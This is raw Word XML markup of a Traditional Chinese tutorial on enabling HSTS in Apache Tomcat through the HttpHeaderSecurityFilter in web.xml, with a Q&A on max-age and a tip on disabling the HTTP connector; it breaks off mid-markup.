          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F269058" w14:textId="324A6D40" w:rsidR="00D160A8" w:rsidRPr="00D160A8" w:rsidRDefault="00D160A8" w:rsidP="00D160A8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D160A8">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D160A8">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://www.twca.com.tw/upload/voucherOption/ckEditor/20210730/edd8670cc0fe4312a954d0afe3b4a3af/ssllogo-c.gif" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D160A8">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D160A8">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E6BF86F" wp14:editId="42B1B72D">
            <wp:extent cx="2389239" cy="1279165"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="7" name="圖片 7" descr="一張含有 文字, 標誌, 字型, 符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標誌, 字型, 符號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37" cy="13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0A8">
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D36C7" w14:textId="77777777" w:rsidR="00D160A8" w:rsidRPr="001B061D" w:rsidRDefault="00D160A8" w:rsidP="00F0328B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD25AD7" w14:textId="77777777" w:rsidR="001B061D" w:rsidRPr="001B061D" w:rsidRDefault="001B061D" w:rsidP="001B061D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D280E3C" w14:textId="77777777" w:rsidR="002415AC" w:rsidRDefault="002415A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</w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB0AD3" w14:textId="115DF90C" w:rsidR="0098676C" w:rsidRPr="00DF5E36" w:rsidRDefault="007247F3" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF5E36">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在 Tomcat 配置 HSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CE17A" w14:textId="4C34C41D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634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HSTS（HTTP Strict Transport Security）是一個安全特性，用於確保網站只能通過安全的 HTTPS 連接來訪問。在 Tomcat 中配置 HSTS 有以下好處：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE463E" w14:textId="1F546D45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增強安全性</w:t>
      </w:r>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：HSTS 能夠強制使用 HTTPS，從而保護網站免受中間人攻擊和嗅探攻擊。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337EB88" w14:textId="04F0B6A7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避免降級攻擊</w:t>
      </w:r>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：攻擊者可能會試圖將 HTTPS 連接降級為 HTTP 連接。HSTS 防止了這種攻擊，因為它會告知瀏覽器只使用 HTTPS 連接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F0D22" w14:textId="219BDC31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自動 HTTPS 重定向</w:t>
      </w:r>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果用戶嘗試通過 HTTP 訪問一個已啟用 HSTS 的網站，瀏覽器會自動將其重定向到 HTTPS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99F04E" w14:textId="735B0E20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預先載入到瀏覽器中</w:t>
      </w:r>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：一些瀏覽器允許網站將其域名加入到一個 HSTS 預先載入名單中。這意味著即使用戶第一次訪問這個網站也會被強制使用 HTTPS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F45D1A" w14:textId="0739E906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提高信任度</w:t>
      </w:r>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：當網站始終使用安全的 HTTPS 連接時，這會增加用戶的信任度，因為他們知道他們的資料在傳輸過程中是安全的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4AB0E" w14:textId="77777777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AA1E56">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>滿足規定和標準</w:t>
      </w:r>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：某些規範或標準可能要求網站必須使用 HTTPS。配置 HSTS 可以幫助滿足這些要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42EE2F" w14:textId="77777777" w:rsidR="00634BCC" w:rsidRPr="00634BCC" w:rsidRDefault="00634BCC" w:rsidP="00634BCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B594B1D" w14:textId="53AD4759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634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在配置 HSTS 時，還應該注意以下幾點：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA34C82" w14:textId="77777777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634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>設定適當的 max-age：這會告知瀏覽器在多長時間內只使用 HTTPS 訪問網站。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB012D" w14:textId="77777777" w:rsidR="00634BCC" w:rsidRPr="00634BCC" w:rsidRDefault="00634BCC" w:rsidP="00634BCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考慮使用 includeSubDomains：這將會強制網站的所有子域也使用 HTTPS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE019A" w14:textId="3996F5B4" w:rsidR="00634BCC" w:rsidRPr="00634BCC" w:rsidRDefault="00634BCC" w:rsidP="00634BCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>測試設定：在應用 HSTS 到生產環境之前，應該在開發或測試環境中測試它，以確保它按預期運作。總的來說，HSTS 提供了一種有效的方式來增強網站的安全性，並保護用戶的數據。在 Tomcat 或任何其他 web 伺服器上配置 HSTS 都是一個值得推薦的安全實踐。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1FF84" w14:textId="77777777" w:rsidR="00B44A4B" w:rsidRDefault="00B44A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"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</w:p>
    <w:p w14:paraId="509AE49E" w14:textId="17F646CC" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="0000144F" w:rsidP="008D3FEF">
      <w:pPr>
        <w:pStyle w:val="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1. </w:t>
      </w:r>
      <w:r w:rsidR="00634BCC">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>設定</w:t>
      </w:r>
      <w:r w:rsidR="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidR="00925D37">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00216E6A">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007247F3" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>conf/web.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469F86B" w14:textId="07FA412F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>約在 49</w:t>
      </w:r>
      <w:r w:rsidR="00AD3B6E">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行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489F183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EE46" w14:textId="3AC1E748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&lt;filter&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A0BF43" w14:textId="09E236F9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&lt;filter-name&gt;httpHeaderSecurity&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD619ED" w14:textId="4663A1B5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&lt;filter-class&gt;org.apache.catalina.filters.HttpHeaderSecurityFilter&lt;/filter-class&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CAD4F80" w14:textId="773F7FE2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&lt;async-supported&gt;true&lt;/async-supported&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FCF9007" w14:textId="5A19E6DA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&lt;init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D55508" w14:textId="43161F8A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&lt;param-name&gt;hstsEnabled&lt;/param-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2BCA60" w14:textId="449A6444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&lt;param-value&gt;true&lt;/param-value&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59FFC719" w14:textId="69F53A46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&lt;/init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4485FE98" w14:textId="0E10C461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&lt;init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6384F85D" w14:textId="167377FC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&lt;param-name&gt;hstsMaxAgeSeconds&lt;/param-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F38FE3E" w14:textId="722D862A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&lt;param-value&gt;31536000&lt;/param-value&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487E9765" w14:textId="564B188C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&lt;/init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B82D5BC" w14:textId="5A08D45B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&lt;init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254E512F" w14:textId="4378A599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&lt;param-name&gt;hstsIncludeSubDomains&lt;/param-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488D4147" w14:textId="2D14BA72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&lt;param-value&gt;true&lt;/param-value&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0E2C63" w14:textId="0CD52FDF" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="00E15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</w:rPr>
              <w:t>&lt;/init-param&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C9CBE0" w14:textId="171FBB81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</w:rPr>
              <w:t>&lt;/filter&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A7170B1" w14:textId="19E37885" w:rsidR="0098676C" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B9AB2E" w14:textId="35D82E31" w:rsidR="00B44A4B" w:rsidRPr="00B44A4B" w:rsidRDefault="00B44A4B" w:rsidP="00B44A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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filter-name </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w: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>filter-class</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：這部分定義了過濾器的名稱和類別。HttpHeaderSecurityFilter 是 Tomcat 提供的一個過濾器，用於增強 HTTP 頭部的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2374E8" w14:textId="4170CE17" w:rsidR="00B44A4B" w:rsidRPr="00B44A4B" w:rsidRDefault="00B44A4B" w:rsidP="00B44A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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>async-supported</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：設定為 true 表示這個過濾器支持異步操作，這是合理的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561FA261" w14:textId="1F9F1C5A" w:rsidR="00B44A4B" w:rsidRPr="00B44A4B" w:rsidRDefault="00B44A4B" w:rsidP="00B44A4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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>hstsEnabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：此參數設定為 true 表示 HSTS 已啟用，這是符合要求的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A933FC6" w14:textId="1A8D7520" w:rsidR="0026491E" w:rsidRDefault="00B44A4B" w:rsidP="0026491E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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>hstsMaxAgeSeconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44A4B">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：這是 HSTS 頭部中的 max-age 屬性，它告訴瀏覽器在多久的時間內，只能使用 HTTPS 訪問該網站。設定為 31536000 秒，即一年，這是一個常見的設定值。網站安全建議的值通常在六個月到一年之間，所以這個設定是合理的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD30D5D" w14:textId="77777777" w:rsidR="00012744" w:rsidRDefault="00012744" w:rsidP="0026491E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3A1DFE" w14:textId="1D8F3A17" w:rsidR="0026491E" w:rsidRPr="00012744" w:rsidRDefault="0026491E" w:rsidP="0026491E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012744">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>問：</w:t>
      </w:r>
      <w:r w:rsidRPr="00012744">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>為何要設這麼久 ? 不是下一次連入就重新計算時間嗎 ?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34DEC" w14:paraId="24936A8F" w14:textId="77777777" w:rsidTr="00F34DEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="013B8D1C" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E" w:rsidRDefault="00F34DEC" w:rsidP="00F34DEC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HSTS (HTTP Strict Transport Security) 的 max-age 屬性確實告訴瀏覽器，在指定的時間內，只能使用 HTTPS 訪問該網站。一旦瀏覽器見到這個 HSTS 頭部，它就會記住這個政策直到 max-age 過期。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A10D0A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17E165F" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E" w:rsidRDefault="00F34DEC" w:rsidP="00F34DEC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設定 max-age 為一個較長的時間（例如一年）有以下好處：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2D025F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2C0B168" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E" w:rsidRDefault="00F34DEC" w:rsidP="00F34DEC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D7272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提高安全性：</w:t>
            </w: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假如攻擊者嘗試利用 "man-in-the-middle" 攻擊來降級使用者的連線到不安全的 HTTP，由於 HSTS 政策已經被瀏覽器記住，瀏覽器會自動將所有該網站的 HTTP 請求升級為 HTTPS，從而阻止此類攻擊。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2562B3C8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697C0B1" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E" w:rsidRDefault="00F34DEC" w:rsidP="00F34DEC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AA72C7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lastRenderedPageBreak/>
              <w:t>減少首次連線的風險：</w:t>
            </w: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當使用者首次訪問一個網站時，如果該網站還沒有設定 HSTS 或 max-age 已經過期，該訪問會面臨降級攻擊的風險。設定一個較長的 max-age 時間可以減少使用者面臨這種風險的次數。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C8399E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A572AC8" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E" w:rsidRDefault="00F34DEC" w:rsidP="00F34DEC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D7272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持久的政策：</w:t>
            </w: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即使使用者有一段時間沒有訪問該網站，長時間的 max-age 仍然可以確保瀏覽器在使用者再次訪問時仍然遵循 HSTS 政策。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D10FFF8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038813F" w14:textId="1A09B1E8" w:rsidR="00F34DEC" w:rsidRPr="00012744" w:rsidRDefault="00F34DEC" w:rsidP="00F34DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00012744">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>關於"不是下一次連入就重新計算時間嗎？"：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C3118D" w14:textId="77777777" w:rsidR="00F34DEC" w:rsidRPr="0026491E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0850287" w14:textId="29125FF8" w:rsidR="00F34DEC" w:rsidRDefault="00F34DEC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6491E">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>是的，每次當瀏覽器接收到一個帶有 HSTS 頭部的響應時，它都會更新其 HSTS 政策的 max-age 值。所以，如果你的伺服器每次響應都發送 HSTS 頭部，那麼 max-age 的計時會被重置。但如果使用者有一段時間沒有訪問你的網站，而你設定的 max-age 是一個較短的時間，那麼該政策可能在使用者再次訪問之前就已經過期，這增加了降級攻擊的風險。因此，設定一個較長的時間可以提供更持久的保護。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F86C7C" w14:textId="15669E27" w:rsidR="00B81243" w:rsidRDefault="00B81243" w:rsidP="00F34DEC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CCDEE20" w14:textId="2ABDB1B0" w:rsidR="00B81243" w:rsidRDefault="00B81243" w:rsidP="00F34DEC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還有一個方法就是把</w:t>
            </w:r>
            <w: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Tomcat HTTP 關閉只開通</w:t>
            </w:r>
            <w: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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS 也是一個方法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F23F914" w14:textId="3F98A2D5" w:rsidR="00B81243" w:rsidRPr="00336165" w:rsidRDefault="00B81243" w:rsidP="00F34DEC">
            <w:pP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  <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00336165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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>conf/server.xml</w:t>
            </w:r>
            <w:r w:rsidR="00336165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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (將</w:t>
            </w:r>
            <w:r w:rsidR="00336165">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體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36165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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTP 設定註解掉)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26603530" w14:textId="77777777" w:rsidR="00B81243" w:rsidRPr="002E0C05" w:rsidRDefault="00B81243" w:rsidP="00B81243">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00336165">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;!--</w:t>
            </w:r>
            <w:r w:rsidRPr="00B81243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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002E0C05">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="18"/>
